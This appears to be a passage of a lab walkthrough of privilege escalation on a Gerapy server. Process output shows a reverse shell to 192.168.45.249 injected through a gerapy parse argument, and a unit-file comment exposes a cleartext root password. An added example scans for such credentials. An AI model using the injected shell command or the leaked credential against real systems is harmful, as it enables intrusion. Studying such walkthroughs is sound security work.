app.service


Checking the app.service

app@ubuntu:~$ systemctl status app.service
 app.service - Gerapy app service
     Loaded: loaded (/etc/systemd/system/app.service; enabled; vendor preset: enabled)
     Active: active (running) since Sat 2024-08-03 12:47:19 CST; 8 months 1 day ago
   Main PID: 844 (bash)
      Tasks: 10 (limit: 2234)
     Memory: 115.4M
        CPU: 8.622s
     CGroup: /system.slice/app.service
             ├─ 844 /bin/bash /home/app/run.sh
             ├─1039 /usr/bin/python3 /usr/local/bin/gerapy runserver 0.0.0.0:8000
             ├─1406 /bin/sh -c "gerapy parse --start False --method GET --url None --callback None --cookies '{}' --headers '{}' --meta '{}' --dont_filter False --priority 0 projects/1 \`/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.249/8000 0>&1'\`"
             ├─1407 /bin/bash -c "bash -i >& /dev/tcp/192.168.45.249/8000 0>&1"
             ├─1408 bash -i
             └─1415 systemctl status app.service

The status output shows that the unit is loaded from /etc/systemd/system/app.service

/etc/systemd/system/app.service


app@ubuntu:~$ cat /etc/systemd/system/app.service
[Unit]
Description=Gerapy app service
 
# root:4!m?C%7k@Xb?XNH0!>6K
 
[Service]
User=app
Type=simple
ExecStart=/bin/bash /home/app/run.sh
 
 
[Install]
WantedBy=multi-user.target
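
A comment like the one in this unit file is something a routine audit can catch. The following is an added example, not part of the original notes: a shell function that reports comment lines shaped like account:secret in unit files without echoing the secret. The function names, the 8-character threshold and the sample files are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag systemd unit files whose comments look like
# "<account>:<secret>". Assumptions: the secret is 8+ characters with no
# whitespace, and <account> must exist in the passwd file given as $2.
# The secret itself is never printed.

scan_unit_comments() (
    dir=$1
    passwd=${2:-/etc/passwd}
    re='^[[:space:]]*[#;][[:space:]]*[A-Za-z_][A-Za-z0-9_-]*:[^[:space:]]{8,}[[:space:]]*$'
    for f in "$dir"/*.service; do
        [ -f "$f" ] || continue
        # A world-readable unit file exposes its comments to every local user.
        mode=restricted
        [ -n "$(find "$f" -prune -perm -004)" ] && mode=world-readable
        grep -nE "$re" "$f" | while IFS= read -r hit; do
            lineno=${hit%%:*}
            account=$(printf '%s\n' "${hit#*:}" |
                sed -E 's/^[[:space:]]*[#;][[:space:]]*([^:]*):.*$/\1/')
            # Report only real local accounts; this drops "https:" and similar.
            grep -q "^${account}:" "$passwd" || continue
            printf '%s:%s:%s:%s\n' "$f" "$lineno" "$account" "$mode"
        done
    done
)

# Constructed sample data: two unit files and a passwd file in a temp directory.
make_sample() (
    d=$(mktemp -d)
    printf '%s\n' '[Unit]' 'Description=Sample service' \
        '# root:Constructed-Secret-123' '# https://example.invalid/docs/unit' \
        '[Service]' 'User=app' 'ExecStart=/bin/true' > "$d/sample.service"
    printf '%s\n' '[Unit]' '# Documentation: see the wiki' \
        '[Service]' 'ExecStart=/bin/true' > "$d/clean.service"
    chmod 644 "$d/sample.service" "$d/clean.service"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'app:x:1000:1000::/home/app:/bin/bash' > "$d/passwd"
    printf '%s\n' "$d"
)

sample=$(make_sample)
scan_unit_comments "$sample" "$sample/passwd"
rm -rf "$sample"
```

Each output line has the form path:line:account:mode, so a hit on a world-readable file can be prioritised over one on a restricted file.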

The service file appears to contain the CLEARTEXT credential of the root account in a comment: 4!m?C%7k@Xb?XNH0!>6K

Validating against the target SSH server